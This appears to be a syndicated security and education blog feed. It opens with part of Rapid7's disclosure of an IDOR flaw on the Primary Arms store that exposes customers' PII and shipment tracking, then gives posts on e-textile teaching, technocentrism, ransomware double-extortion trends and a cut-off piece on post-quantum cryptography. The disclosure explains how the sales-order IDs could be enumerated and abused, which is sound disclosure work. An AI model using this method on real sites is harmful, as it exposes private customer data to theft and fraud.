  • Last four digits and issuer of the credit card used
  • Billing address and phone number

Manipulating this value produces other sets of PII from other customers, though the distribution is non-uniform and currently unknown (see below, under Impact, for more information).

If a given salesorder reference includes a shipped item, that tracking information is also displayed, as shown in this redacted example:

Primary Arms PII Disclosure via IDOR

Depending on the carrier and the age of the ordered item, this tracking information could then be used to monitor and possibly intercept delivery of the shipped items.

Root cause

The landing page for primaryarms.com and other pages have this auto-generated comment in the HTML source:

<!-- SuiteCommerce [ prodbundle_id "295132" ] [ baselabel "SC_2019.2" ] [ version "2019.2.3.a" ] [ datelabel "2020.00.00" ] [ buildno "0" ] -->
<!-- 361 s: 25% #59 cache: 4% #17 -->
<!-- Host [ sh14.prod.bos ] App Version [ 2022.1.15.30433 ] -->
<!-- COMPID [ 3901023 ] URL [ /s.nl ] Time [ Mon Jul 11 09:33:51 PDT 2022 ] -->
<!-- Not logging slowest SQL -->

This indicates a somewhat old version of SuiteCommerce, from 2019, being run in production. It’s hard to say for sure that this is the culprit of the issue, or even if this comment is accurate, but our colleagues at CERT/CC noticed that NetSuite released an update in 2020 that addressed CVE-2020-14728, which may be related to this IDOR.

Outside of this hint, the root cause of this issue is unknown at the time of this writing. It may be as straightforward as updating the local NetSuite instance, or there may be more local configuration needed to ensure that sales order receipts require proper authentication in order to read them.

Post-authentication considerations

Note that becoming an authenticated user is trivial for the Primary Arms website. New users are invited to create an account, and while a validly formatted email address is required, it is not authenticated. In the example gathered here, the simulated attacker, FakeTod, has the nonexistent email address of [email protected]. Therefore, there is no practical difference between an unauthenticated user and an authenticated user for the purpose of exploitation.

Impact

By exploiting this vulnerability, an attacker can learn the PII of likely firearms enthusiasts. However, exploiting this vulnerability at a reasonable scale may prove somewhat challenging.

Possible valid IDOR values

It is currently unknown how the salesorder values are generated, as Rapid7 has conducted very limited testing in order to merely validate the existence of the IDOR issue. We’re left with two possibilities.

It is the likely case that the salesorder values are sequential, start at a fixed point in the 8-digit space, and increment with every new transaction in a predictable way. If this is the case, exhausting the possible space of valid IDOR values is fairly trivial — only a few seconds to automate the discovery of newly created sales order records, and a few minutes to gather all past records. While limited testing indicates salesorder values are sequential, there are gaps in the sequence, likely due to abandoned and partial orders. We have not fully explored the attack surface of this issue out of an abundance of caution and restraint.

In the worst case (for the attacker), the numbers may be purely random out of a space of 100 million possibles. This seems unlikely according to Rapid7’s limited testing. If this is the case, however, exhausting the entire space for all records would take about two years, assuming an average of 100 queries per second (this probing would be noticeable by the website operators assuming normal website instrumentation).

The truth of the salesorder value generation is probably somewhere closer to the former than the latter, given past experience with similar bugs of this nature, which leads us to this disclosure in the interest of public safety, documented in the next section.

Possible attacks

We can imagine a few scenarios where attackers might find this collection of PII useful. The most obvious attack would be a follow-on phishing attack, identity theft, or other confidence scam, since PII is often useful in executing successful social engineering attacks. An attacker could pose as Primary Arms, another related organization, or the customer and be very convincing in such identity (to a third-party) when armed with the name, address, phone number, last four digits of a credit card, and recent purchase history.

Additionally, typical Primary Arms customers are self-identified firearms owners and enthusiasts. A recent data breach in June of 2022 involving California Conceal Carry License holders caused a stir among firearms enthusiasts, who worry that breach would lead to “increase the risk criminals will target their homes for burglaries.”

Indeed, if it is possible to see recent transactions (again, depending on how salesorder values are generated), especially those involving FFL holders, it may be possible for criminals to intercept firearms and firearms accessories in transit by targeting specific delivery addresses.

Finally, there is the potential that domestic terrorist organizations and foreign intelligence operations could use this highly specialized PII in recruiting, disinformation, and propaganda efforts.

Remediation

As mentioned above, it would appear that only Primary Arms is in a position to address this issue. We suspect this issue may be resolved by using a more current release of NetSuite SuiteCommerce. A similar e-commerce site, using similar technology but with a more updated version of SuiteCommerce, appears to not be subject to this specific attack technique, so it’s unlikely this is a novel vulnerability in the underlying web technology stack.

Customers affected by this issue are encouraged to try to contact Primary Arms, either by email to [email protected], or by calling customer service at +1 713.344.9600.

Disclosure timeline

At the time of this writing, Primary Arms has not been responsive to disclosure efforts by Rapid7, CERT/CC, or TX-ISAO.

  • May 2022 – Issue discovered by a Rapid7 security researcher
  • Mon, May 16, 2022 – Initial contact to Primary Arms at [email protected]
  • Wed, May 25, 2022 – Attempt to contact Primary Arms CTO via guessed email address
  • Wed, May 25, 2022 – Internal write-up of IDOR issue completed and validated
  • Thu, May 26, 2022 – Attempt to contact Primary Arms CEO via guessed email address
  • Tue, May 31, 2022 – Called customer support, asked for clarification on contact, reported issue
  • Thu, Jun 1, 2022 – Notified CERT/CC via [email protected] asking for advice
  • Fri, Jun 10, 2022  – Opened a case with CERT/CC, VRF#22-06-QFRZJ
  • Thu, Jun 16, 2022  – CERT/CC begins investigation and disclosure attempts, VU#615142
  • June-July 2022 – Collaboration with CERT/CC to validate and scope the issue
  • Mon, Jul 11, 2022 – Completed disclosure documentation presuming no contact from Primary Arms
  • Tue, Jul 12, 2022 – Sent a paper copy of this disclosure to Primary Arms via certified US mail, tracking number: 420770479514806664112193691642
  • Thu, Jul 14, 2022 – Disclosed details to the Texas Information Sharing and Analysis Organization (TX-ISAO), Report #ISAO-CT-0052
  • Mon, Jul 18, 2022 – Paper copy received by Primary Arms
  • Tue, Aug 2, 2022 – This public disclosure

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Using e-textiles to deliver equitable computing lessons and broaden participation

Post Syndicated from Katharine Childs original https://www.raspberrypi.org/blog/using-e-textiles-to-deliver-equitable-computing-lessons-and-broaden-participation/

In our current series of research seminars, we are exploring how computing can be connected to other subjects using cross-disciplinary approaches. In July 2022, our speakers were Professor Yasmin Kafai from the University of Pennsylvania and Elaine Griggs, an award-winning teacher from Pembroke High School, Massachusetts, and we heard about their use of e-textiles to engage learners and broaden participation in computing. 

Professor Yasmin Kafai illustrated her research with a wonderful background made up of young people’s e-textile projects

Building new clubhouses

The spaces where young people learn about computing have sometimes been referred to as clubhouses to relate them to the places where sports or social clubs meet. A computing clubhouse can be a place where learners come together to take part in computing activities and gain a sense of community. However, as Yasmin pointed out, research has found that computing clubhouses have also often been dominated by electronics and robotics activities. This has led to clubhouses being perceived as exclusive spaces for only the young people who share those interests.

Yasmin’s work is motivated by the idea of building new clubhouses that include a wide range of computing interests, with a specific focus on spaces for e-textile activities, to show that diverse uses of computing are valued. 

At Coolest Projects, a group of people explore a coding project.
A group of young people share their projects at Coolest Projects

Yasmin’s research into learning through e-textiles has taken place in formal computing lessons in high schools in America, by developing and using a unit from the Exploring Computer Science curriculum called “Stitching the Loop”. In the seminar, we were fortunate to be joined by Elaine, a computer science and robotics teacher who has used the scheme of work in her classroom. Elaine’s learners have designed wearable electronic textile projects with microcontrollers, sensors, LEDs, and conductive thread. With these materials, learners have made items such as paper circuits, wristbands, and collaborative banners, as shown in the examples below. 

alt=""
 Items created by learners in the e-textile units of work

Teaching approaches for equity-oriented learning

The hands-on, project-based approach in the e-textile unit has many similarities with the principles underpinning the work we do at the Raspberry Pi Foundation. However, there were also two specific teaching approaches that were embedded in Elaine’s teaching in order to promote equitable learning in the computing classroom: 

  1. Prioritising time for learners to design their artefacts at the start of the activity.
  2. Reflecting on learning through the use of a digital portfolio.  

Making time for design

As teachers with a set of learning outcomes to deliver, we can often feel a certain pressure to structure lessons so that our learners spend the most time on activities that we feel will deliver those outcomes. I was very interested to hear how in these e-textile projects, there was a deliberate choice to foreground the aesthetics. When learners spent time designing their artefacts and could link it to their own interests, they had a sense of personal ownership over what they were making, which encouraged them to persevere and overcome any difficulties with sewing, code, or electronics. 

Title: Process of making your project.   Learner's reflection: One main challenge that I faced while making this project was setting up my circuit diagram. I had trouble setting up where all my lights were gonna be placed at, and I had trouble color coding where the negatives and positives would be at. I sketched about 6 different papers and the 6th page was the one that came out fine because all of the other ones had negative and positive crossings which was not gonna help the program work, so I was finally able to get my diagram correct.
Spending time on design helped this learner to persevere with problem-solving

My personal reflection was that creating a digital textiles project based on a set template could be considered the equivalent of teaching programming by copying code. Both approaches would increase the chances of a successful output, but wouldn’t necessarily increase learners’ understanding of computing concepts, nor encourage learners to perceive computing as a subject where everyone belongs. I was inspired by the insights shared at the seminar about how prioritising design time can lead to more diverse representations of making. 

Reflecting on learning using a digital portfolio

Elaine told us that learners were encouraged to create a digital portfolio which included photographs of the different stages of their project, examples of their code, and reflections on the problems that they had solved during the project. In the picture below, the learner has shared both the ‘wrong’ and ‘right’ versions of their code, along with an explanation of how they debugged the error. 

A student portfolio with the title 'Coding Challenge'. The wrong code is on the left-hand side and the right code is on the right. The student has included an explanation beneath the wrong code: This is the wrong code. The problem I had was that I was putting the semicolon outside of the bracket. But the revision I needed was putting the semicolon inside of the bracket. That problem was a hard one to see because it is a very minor problem and most people wouldn't have caught it.
A learner’s example of debugging code from their portfolio

Yasmin explained the equity-oriented theories underpinning the digital portfolio teaching approach. The learners’ reflections allowed deeper understanding of the computing and electronics concepts involved and helped to balance the personalised nature of their artefacts with the need to meet learning goals.

Yasmin also emphasised how important it was for learners to take part in a series of projects so that they encountered computing and electronics concepts more than once. In this way, reflective journalling can be seen as an equitable teaching approach because it helps to move learners on from their initial engagement into more complex projects. Thinking back to the clubhouse model, it is equally important for learners to be valued for their complex e-textile projects as it is for their complex robotics projects, and so portfolios of a series of e-textile projects show that a diverse range of learners can be successful in computing at the highest levels. 

Try e-textiles with your learners

alt=""
Science and nature models made with an RPF project

If you’re thinking about ways of introducing e-textile activities to your learners, there are some useful resources here: 

  • The Exploring Computer Science page contains all the information and resources relating to the “Stitching the Loop” electronic textiles unit. You can also find the video that Yasmin and Elaine shared during the seminar. 
  • For e-textiles in a non-formal learning space, the StitchFest webpage has lots of information about an e-textile hackathon that took place in 2014, designed to broaden participation and perceptions in computing. 
  • 3D LED science display with Scratch” is a project that combines using LEDs with science and nature to create a 3D installation. This project is from the Raspberry Pi Foundation’s “Physical computing with Scratch and the Raspberry Pi” projects pathway.

Looking forward to our next free seminar

We’re having a short break in the seminar series but will be back in September when we’ll be continuing to find out more about cross-disciplinary approaches to computing.

In our next seminar on Tuesday 6 September 2022 at 17:00–18:30 BST / 12:00–13:30 EST / 9:00–10:30 PST / 18:00–19:30 CEST, we’ll be hearing all about the links between computing and dance, with our speaker Genevieve Smith-Nunes (University of Cambridge). Genevieve will be speaking about data ethics for the computing classroom through biometrics, ballet, and augmented reality (AR) which promises to be a fascinating perspective on bringing computing to new audiences.

The post Using e-textiles to deliver equitable computing lessons and broaden participation appeared first on Raspberry Pi.

To Maze and Beyond: How the Ransomware Double Extortion Space Has Evolved

Post Syndicated from Tom Caiazza original https://blog.rapid7.com/2022/07/27/to-maze-and-beyond-how-the-ransomware-double-extortion-space-has-evolved/

To Maze and Beyond: How the Ransomware Double Extortion Space Has Evolved

We’re here with the final installment in our Pain Points: Ransomware Data Disclosure Trends report blog series, and today we’re looking at a unique aspect of the report that clarifies not just what ransomware actors choose to disclose, but who discloses what, and how the ransomware landscape has changed over the last two years.

Firstly, we should tell you that our research centered around the concept of double extortion. Unlike traditional ransomware attacks, where bad actors take over a victim’s network and hold the data hostage for ransom, double extortion takes it a step further and extorts the victim for more money with the threat (and, in some cases, execution) of the release of sensitive data. So not only does a victim experience a ransomware attack, they also experience a data breach, and the additional risk of that data becoming publicly available if they do not pay.

According to our research, there have been a handful of major players in the double extortion field starting in April 2020, when our data begins, and February 2022. Double extortion itself was in many ways pioneered by the Maze ransomware group, so it should not surprise anyone that we will focus on them first.

The rise and fall of Maze and the splintering of ransomware double extortion

Maze’s influence on the current state of ransomware should not be understated. Prior to the group’s pioneering of double extortion, many ransomware actors intended to sell the data they encrypted to other criminal entities. Maze, however, popularized another revenue stream for these bad actors, leaning on the victims themselves for more money. Using coercive pressure, Maze did an end run around one of the most important safeguards organizations can take against ransomware: having safely secured and regularly updated backups of their important data.

Throughout most of 2020 Maze was the leader of the double extortion tactic among ransomware groups, accounting for 30% of the 94 reported cases of double extortion between April and December of 2020. This is even more remarkable given the fact that Maze itself was shut down in November of 2020.

Other top ransomware groups also accounted for large percentages of data disclosures. For instance, in that same year, REvil/Sodinokibi accounted for 19%, Conti accounted for 14%, and NetWalker 12%. To give some indication of just how big Maze’s influence was and offer explanation for what happened after they were shut down, Maze and REvil/Sodinokibi accounted for nearly half of all double extortion attacks that year.

However, once Maze was out of the way, double extortion still continued, just with far more players taking smaller pieces of the pie. Conti and REvil/Sodinokibi were still major players in 2021, but their combined market share barely ticked up, making up just 35% of the market even without Maze dominating the space. Conti accounted for 19%, and REvil/Sodinokibi dropped to 16%.

But other smaller players saw increases in 2021. CL0P’s market share rose to 9%, making it the third most active group. Darkside and RansomEXX both went from 2% in 2020 to 6% in 2021. There were 16 other groups who came onto the scene, but none of them took more than 5% market share. Essentially, with Maze out of the way, the ransomware market splintered with even the big groups from the year before being unable to step in and fill Maze’s shoes.

What they steal depends on who they are

Even ransomware groups have their own preferred types of data to steal, release, and hold hostage. REvil/Sodinokibi focused heavily on releasing customer and patient data (present in 55% of their disclosures), finance and accounting data (present in 55% of their disclosures), employee PII and HR data (present in 52% of their disclosures), and sales and marketing data (present in 48% of their disclosures).

CL0P on the other hand was far more focused on Employee PII & HR data with that type of information present in 70% of their disclosures, more than double any other type of data. Conti overwhelmingly focused on Finance and Accounting data (present in 81% of their disclosures) whereas Customer & Patient Data was just 42% and Employee PII & HR data at just 27%.

Ultimately, these organizations have their own unique interests in the type of data they choose to steal and release during the double extortion layer of their ransomware attacks. They can act as calling cards for the different groups that help illuminate the inner workings of the ransomware ecosystem.

Thank you for joining us on this unprecedented dive into the world of double extortion as told through the data disclosures themselves. To dive even deeper into the data, download the full report.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Are you technocentric? Shifting from technology to people

Post Syndicated from Jane Waite original https://www.raspberrypi.org/blog/technocentrism-shifting-from-technology-to-people-computing-education-pratim-sengupta-research-seminar/

When we teach children and young people about computing, do we consider how the subject has developed over time, how it relates to our students’ lives, and importantly, what our values are? Professor Pratim Sengupta shared some of the research he and his colleagues have been working on related to these questions in our June 2022 research seminar.

Pratim Sengupta.
Prof. Pratim Sengupta

Pratim revealed a complex landscape where we as educators can be easily trapped by what may seem like good intentions, thereby limiting learning and excluding some students. His presentation, entitled Computational heterogeneity in STEM education, introduced me to the concept of technocentrism and profoundly impacted my thinking about the essence of programming and how I research it. In this blog post, particularly for those unable to attend this stimulating seminar, I give my simplified view of the rich philosophy shared by Pratim, and my fledgling steps to admit to my technocentrism and overcome it.

Our seminars on teaching cross-disciplinary computing

Between May 2022 and November 2022, we are hosting a new series of free research seminars about teaching computing in different ways and in different contexts. This second seminar of the series was well attended with participants from the USA, Asia, Africa, and Europe, including teachers, researchers, and industry professionals, who contributed to a lively and thought-provoking discussion.

Two teachers and a group of learners are gathered around a laptop screen.

Pratim is a learning scientist based in Canada with a long and distinguished career. He has studied how to teach computational modelling in K-12 STEM classrooms and investigates the complexity of learning. Grounded in working with teachers and students, he brings together computing, science, education, and social justice. Based on his work at Northwestern University, Vanderbilt University, and now with the Mind, Matter and Media lab at the University of Calgary, Pratim has published hundreds of academic papers over some 20 years. Pratim and his team challenge how we focus on making technological artefacts — code for code’s sake — in computing education, and refocuses us on the human experience of coding and learning to code.

What is technocentrism?

Pratim started the seminar by giving us an overview of some of the key ideas that underpin the way that computing is usually taught in schools, including technocentrism (Figure 1).

Pratim Sengupta's summary of technocentrism: device-centred approaches for pedagogy and computational design; ignores teaching, social and institutional infrastructures, cultural histories; transparency or universality of code as symbolic power; recursive methods for education research, experience measured by being folded back onto devices; leads to symbolic violence, misrecognition of experience, muting and omission of voices, affect and moral dimensions of experience.
Figure 1: The features of technocentrism, a way of thinking about how we teach computing, particularly programming (Sengupta, 2022). Click to enlarge.

I have come to a simplified understanding of technocentrism. To me, it appears to be a way of looking at how we learn about computer science, where one might:

  • Focus on the finished product (e.g. a computer program), rather than thinking about the people who create, learn about, or use a program
  • Ignore the context and the environment, rather than paying attention to the history, the political situation, and the social context of the task at hand
  • View computing tasks as being implemented (enacted) by writing code, rather than seeing computing activities as rich and complex jumbles of meaning-making and communication that involve people using chatter, images, and lots of gestures
  • Anchor learning in concepts and skills, rather than placing the values and viewpoints of learners at the heart of teaching 

Examples of technocentrism and how to overcome it

Pratim recounted several research activities that he and his team have engaged with. These examples highlight instances of potential technocentrism and investigate how we might overcome it.

In the first example research activity, Pratim explained how in maths and physics lessons, middle school students were asked to develop models to solve time and distance problems. Rather than immediately coding a potential solution, the researcher and teacher supported the learners to spend much time developing a shared perspective to understand and express the problems first. Students grappled with different ways of representing the context, including graphs and diagrams (see Figure 2). Gradually and carefully, teachers shifted students to recognise what was important and what was not, to move them toward a meaningful language to describe and solve the problems.

Research results from Pratim Sengupta showing students' graph designs and how much time they spent on various activities during the graphing task.
Figure 2: Two graphs from students showing different representations of a context, and a researcher’s bar chart representing how students’ shared understanding emerged over time (Sengupta, 2022). Click to enlarge.

In a second example research activity, students were asked to build a machine that draws shapes using sensors, motors, and code. Rather than jumping straight to a solution, the students spent time with authentic users of their machines. Throughout the process, students worked with others, expressing the context through physical movement, clarifying their thoughts by drawing diagrams, and finding the sweet spot between coding, engineering design, and maths (see Figure 3).

Research results from Pratim Sengupta showing images documenting a physical computing design activity and how learners explained their design.
Figure 3:  Students used physical movements and user guides to be with others and publicly share and experience the task with authentic users (Sengupta, 2022). Click to enlarge.

In a third example research activity, racial segregation of US communities was discussed with pre-service teachers. The predominately white teachers found talking about the topic very difficult at the beginning of the activity. To overcome this hesitancy, teachers were first asked to work with a simulation that modelled the process of segregation through abstracted dots (or computational agents), a transitional other. Following this hypothetical representation, the context was then recontextualised through a map of real data points of the ethnicity of residents in an area of the US. This kind of map is called a Racial Dot Map based on US census data. When the teachers were able to interpret the link between the abstracted dot simulation and the real-world data they were able to talk about racism and segregation in a way they could not do before. The initial simulation and the recontextualisation were a pedagogical tool to reveal racism and provide a space where students felt comfortable discussing their values and beliefs that would otherwise have remained implicit.

Pratim Sengupta explains a research activity with predominantly white pre-service teachers who learned to discuss racism and segregation through a transitional othering activity using maps and graphing census data.
Figure 4: To facilitate discussion of racial segregation, a simulation was used that bridges abstracted dots and real people, giving pre-service teachers a space to reflect on discrimination  (Sengupta, 2022). Click to enlarge.

My takeaways

Pratim shared four implications of this research for computing pedagogy (see Figure 5).

Pratim Sengupta presents the pedagogical implications of shifting from technocentrism to perspectival heterogeneity in education: code as utterances and intertext; heterogeneity and tranformation of representational genres, code lives in translation; teachers' voice needs to be centred in system and activity design and classroom work, researchers must listen; uncertainty and ambiguity play central roles, recognition takes time.
Figure 5: Pratim’s four implications for pedagogy. Click to enlarge

As a researcher of pedagogy, these points provide takeaways that I can relate to my own research practice:

  • Code is a voice within an experience rather than symbols at a point in time. For example, when I listen to students predicting what a snippet of code will do, I think of the active nature of each carefully chosen command and how for each student, the code corresponds with them differently.
  • Code lives as a translation bridging many dimensions, such as data representation, algorithms, syntax, and user views. This statement resonates deeply with my liking of Carsten Schultes’s block model [1] but extends to include the people involved.
  • We should listen carefully and attentively to teachers, rather than making assumptions about what happens in classrooms. Teachers create new ideas. This takeaway is very important and reminds me about the trust and relationships built between teachers and researchers and how important it is to listen.
  • Uncertainty and ambiguity exist in learning, and this can take time to recognise. This final point makes me smile. As a developer, teacher, and researcher, I have found dealing with ambiguity hard at various points in my career. Still, over time, I think I am getting better at seeing it and celebrating it. 

Listening to Pratim share his research on the teaching and learning of computing and the pitfalls of technocentrism has made me think deeply about how I view computer science as a subject and do research about it. I have shared some of my reflections in this blog, and I plan to incorporate the underlying theory and ideas in my ongoing research projects.

If you would like to find out more about Pratim’s work, please look over his slides, watch his presentation, read the upcoming chapter in our seminar proceedings, or respond to this blog by leaving a comment so we can discuss!

Join our next seminar

We have another four seminars in our current series on cross-disciplinary computing

At our next seminar on 12 July 2022 at 17:00–18:30 BST / 12:00–13:30 EDT / 9:00–10:30 PDT / 18:00–19:30 CEST, we will welcome Prof. Yasmin Kafai and Elaine Griggs, who are going to present research on introductory equity-oriented computer science with electronic textiles for high school students.

We look forward to meeting you there.


[1] You can learn more in the Hello World article where our Chief Learning Officer Sue Sentance talks about the block model.

The post Are you technocentric? Shifting from technology to people appeared first on Raspberry Pi.

NIST’s pleasant post-quantum surprise

Post Syndicated from Bas Westerbaan original https://blog.cloudflare.com/nist-post-quantum-surprise/

NIST’s pleasant post-quantum surprise

NIST’s pleasant post-quantum surprise

On Tuesday, the US National Institute of Standards and Technology (NIST) announced which post-quantum cryptography they will standardize. We were already drafting this post with an educated guess on the choice NIST would make. We almost got it right, except for a single choice we didn’t expect—and which changes everything.

At Cloudflare, post-quantum cryptography is a topic close to our heart, as the future of a secure and private Internet is on the line. We have been working towards this day for many years, by implementing post-quantum cryptography, contributing to standards, and testing post-quantum cryptography in practice, and we are excited to share our perspective.

In this long blog post, we explain how we got here, what NIST chose to standardize, what it will mean for the Internet, and what you need to know to get started with your own post-quantum preparations.

How we got here

Shor’s algorithm

Our story starts in 1994, when mathematician Peter Shor discovered a marvelous algorithm that efficiently factors numbers and computes discrete logarithms. With it, you can break nearly all public-key cryptography deployed today, including RSA and elliptic curve cryptography. Luckily, Shor’s algorithm doesn’t run on just any computer: it needs a quantum computer. Back in 1994, quantum computers existed only on paper.

But in the years since, physicists started building actual quantum computers. Initially, these machines were (and still are) too small and too error-prone to be threatening to the integrity of public-key cryptography, but there is a clear and impending danger: it only seems a matter of time now before a quantum computer is built that has the capability to break public-key cryptography. So what can we do?

Encryption, key agreement and signatures

To understand the risk, we need to distinguish between the three cryptographic primitives that are used to protect your connection when browsing on the Internet:

Symmetric encryption. With a symmetric cipher there is one key to encrypt and decrypt a message. They’re the workhorse of cryptography: they’re fast, well understood and luckily, as far as known, secure against quantum attacks. (We’ll touch on this later when we get to security levels.) Examples are AES and ChaCha20.

Symmetric encryption alone is not enough: which key do we use when visiting a website for the first time? We can’t just pick a random key and send it along in the clear, as then anyone surveilling that session would know that key as well. You’d think it’s impossible to communicate securely without ever having met, but there is some clever math to solve this.

Key agreement, also called a key exchange, allows two parties that never met to agree on a shared key. Even if someone is snooping, they are not able to figure out the agreed key. Examples include Diffie–Hellman over elliptic curves, such as X25519.

The key agreement prevents a passive observer from reading the contents of a session, but it doesn’t help defend against an attacker who sits in the middle and does two separate key agreements: one with you and one with the website you want to visit. To solve this, we need the final piece of cryptography:

Digital signatures, such as RSA, allow you to check that you’re actually talking to the right website with a chain of certificates going up to a certificate authority.

Shor’s algorithm breaks all widely deployed key agreement and digital signature schemes, which are both critical to the security of the Internet. However, the urgency and mitigation challenges between them are quite different.

Impact

Most signatures on the Internet have a relatively short lifespan. If we replace them before quantum computers can crack them, we’re golden. We shouldn’t be too complacent here: signatures aren’t that easy to replace as we will see later on.

More urgently, though, an attacker can store traffic today and decrypt later by breaking the key agreement using a quantum computer. Everything that’s sent on the Internet today (personal information, credit card numbers, keys, messages) is at risk.

NIST Competition

Luckily cryptographers took note of Shor’s work early on and started working on post-quantum cryptography: cryptography not broken by quantum algorithms. In 2016, NIST, known for standardizing AES and SHA, opened a public competition to select which post-quantum algorithms they will standardize. Cryptographers from all over the world submitted algorithms and publicly scrutinized each other’s submissions. To focus attention, the list of potential candidates were whittled down over three rounds. From the original 82 submissions, eight made it into the final third round. From those eight, NIST chose one key agreement scheme and three signature schemes. Let’s have a look at the key agreement first.

What NIST announced

Key agreement

For key agreement, NIST picked only Kyber, which is a Key Encapsulation Mechanism (KEM). Let’s compare it side-by-side to an RSA-based KEM and the X25519 Diffie–Hellman key agreement:

NIST’s pleasant post-quantum surprise
Performance characteristics of Kyber and RSA. We compare instances of security level 1, see below. Timings vary considerably by platform and implementation constraints and should be taken as a rough indication only.
NIST’s pleasant post-quantum surprise
Performance characteristics of the X25519 Diffie–Hellman key agreement commonly used in TLS 1.3.
KEM versus Diffie–Hellman

To properly compare these numbers, we have to explain how KEM and Diffie–Hellman key agreements are different.

NIST’s pleasant post-quantum surprise
Protocol flow of KEM and Diffie-Hellman key agreement.

Let’s start with the KEM. A KEM is essentially a Public-Key Encryption (PKE) scheme tailored to encrypt shared secrets. To agree on a key, the initiator, typically the client, generates a fresh keypair and sends the public key over. The receiver, typically the server, generates a shared secret and encrypts (“encapsulates”) it for the initiator’s public key. It returns the ciphertext to the initiator, who finally decrypts (“decapsulates”) the shared secret with its private key.

With Diffie–Hellman, both parties generate a keypair. Because of the magic of Diffie–Hellman, there is a unique shared secret between every combination of a public and private key. Again, the initiator sends its public key. The receiver combines the received public key with its own private key to create the shared secret and returns its public key with which the initiator can also compute the shared secret.

NIST’s pleasant post-quantum surprise
Interactive versus non-interactive key agreement

As an aside, in this simple key agreement (such as in TLS), there is not a big difference between using a KEM or Diffie–Hellman: the number of round-trips is exactly the same. In fact, we’re using Diffie–Hellman essentially as a KEM. This, however, is not the case for all protocols: for instance, the 3XDH handshake of Signal can’t be done with plain KEMs and requires the full flexibility of Diffie–Hellman.

Now that we know how to compare KEMs and Diffie–Hellman, how does Kyber measure up?

Kyber

Kyber is a balanced post-quantum KEM. It is very fast: much faster than X25519, which is already known for its speed. Its main drawback, common to many post-quantum KEMs, is that Kyber has relatively large ciphertext and key sizes: compared to X25519 it adds 1,504 bytes. Is this problematic?

We have some indirect data. Back in 2019 together with Google we tested two post-quantum KEMs, NTRU-HRSS and SIKE in Chrome. SIKE has very small keys, but is computationally very expensive. NTRU-HRSS, on the other hand, has similar performance characteristics to Kyber, but is slightly bigger and slower. This is what we found:

NIST’s pleasant post-quantum surprise
Handshake times for TLS with X25519 (control), NTRU-HRSS (CECPQ2) and SIKE (CECPQ2b). Both post-quantum KEMs were combined with a X25519 key agreement.

In this experiment we used a combination (a hybrid) of the post-quantum KEM and X25519. Thus NTRU-HRSS couldn’t benefit from its speed compared to X25519. Even with this disadvantage, the difference in performance is very small. Thus we expect that switching to a hybrid of Kyber and X25519 will have little performance impact.

So can we switch to post-quantum TLS today? We would love to. However, we have to be a bit careful: some TLS implementations are brittle and crash on the larger KeyShare message that contains the bigger post-quantum keys. We will work hard to find ways to mitigate these issues, as was done to deploy TLS 1.3. Stay tuned!

The other finalists

It’s interesting to have a look at the KEMs that didn’t make the cut. NIST intends to standardize some of these in a fourth round. One reason is to increase the diversity in security assumptions in case there is a breakthrough in attacks on structured lattices on which Kyber is based. Another reason is that some of these schemes have specialized, but very useful applications. Finally, some of these schemes might be standardized outside of NIST.

Structured lattices Backup Specialists
NTRU BIKE 4️⃣ Classic McEliece 4️⃣
NTRU Prime HQC 4️⃣ SIKE 4️⃣
SABER FrodoKEM

The finalists and candidates of the third round of the competition. The ones marked with 4️⃣ are proceeding to a fourth round and might yet be standardized.

The structured lattice generalists

Just like Kyber, the KEMs SABER, NTRU and NTRU Prime are all structured lattice schemes that are very similar in performance to Kyber. There are some finer differences, but any one of these KEMs would’ve been a great pick. And they still are: OpenSSH 9.0 chose to implement NTRU Prime.

The backup generalists

BIKE, HQC and FrodoKEM are also balanced KEMs, but they’re based on three different underlying hard problems. Unfortunately they’re noticeably less efficient, both in key sizes and computation. A breakthrough in the cryptanalysis of structured lattices is possible, though, and in that case it’s nice to have backups. Thus NIST is advancing BIKE and HQC to a fourth round.

While NIST chose not to advance FrodoKEM, which is based on unstructured lattices, Germany’s BSI prefers it.

The specialists

The last group of post-quantum cryptographic algorithms under NIST’s consideration are the specialists. We’re happy that both are advancing to the fourth round as they can be of great value in just the right application.

First up is Classic McEliece: it has rather unbalanced performance characteristics with its large public key (261kB) and small ciphertexts (128 bytes). This makes McEliece unsuitable for the ephemeral key exchange of TLS, where we need to transmit the public key. On the other hand, McEliece is ideal when the public key is distributed out-of-band anyway, as is often the case in applications and mobile apps that pin certificates. To use McEliece in this way, we need to change TLS a bit. Normally the server authenticates itself by sending a signature on the handshake. Instead, the client can encrypt a challenge to the KEM public key of the server. Being able to decrypt it is an implicit authentication. This variation of TLS is known as KEMTLS and also works great with Kyber when the public key isn’t known beforehand.

Finally, there is SIKE, which is based on supersingular isogenies. It has very small key and ciphertext sizes. Unfortunately, it is computationally more expensive than the other contenders.

Digital signatures

As we just saw, the situation for post-quantum key agreement isn’t too bad: Kyber, the chosen scheme is somewhat larger, but it offers computational efficiency in return. The situation for post-quantum signatures is worse: none of the schemes fit the bill on their own for different reasons. We discussed these issues at length for ten of them in a deep-dive last year. Let’s restrict ourselves for the moment to the schemes that were most likely to be standardized and compare them against Ed25519 and RSA-2048, the schemes that are in common use today.

NIST’s pleasant post-quantum surprise

Performance characteristics of NIST’s chosen signature schemes compared to Ed25519 and RSA-2048. We compare instances of security level 1, see below. Timings vary considerably by platform and implementation constraints and should be taken as a rough indication only. SPHINCS+ was timed with simple haraka as the underlying hash function. (*) Falcon requires a suitable double-precision floating-point unit for fast signing.

Floating points: Falcon’s achilles

All of these schemes have much larger signatures than those commonly used today. Looking at just these numbers, Falcon is the best of the worst. It, however, has a weakness that this table doesn’t show: it requires fast constant-time double-precision floating-point arithmetic to have acceptable signing performance.

Let’s break that down. Constant time means that the time the operation takes does not depend on the data processed. If the time to create a signature depends on the private key, then the private key can often be recovered by measuring how long it takes to create a signature. Writing constant-time code is hard, but over the years cryptographers have got it figured out for integer arithmetic.

Falcon, crucially, is the first big cryptographic algorithm to use double-precision floating-point arithmetic. Initially it wasn’t clear at all whether Falcon could be implemented in constant-time, but impressively, Falcon was implemented in constant-time for several different CPUs, which required several clever workarounds for certain CPU instructions.

Despite this achievement, Falcon’s constant-timeness is built on shaky grounds. The next generation of Intel CPUs might add an optimization that breaks Falcon’s constant-timeness. Also, many CPUs today do not even have fast constant-time double-precision operations. And then still, there might be an obscure bug that has been overlooked.

In time it might be figured out how to do constant-time arithmetic on the FPU robustly, but we feel it’s too early to deploy Falcon where the timing of signature minting can be measured. Notwithstanding, Falcon is a great choice for offline signatures such as those in certificates.

Dilithium’s size

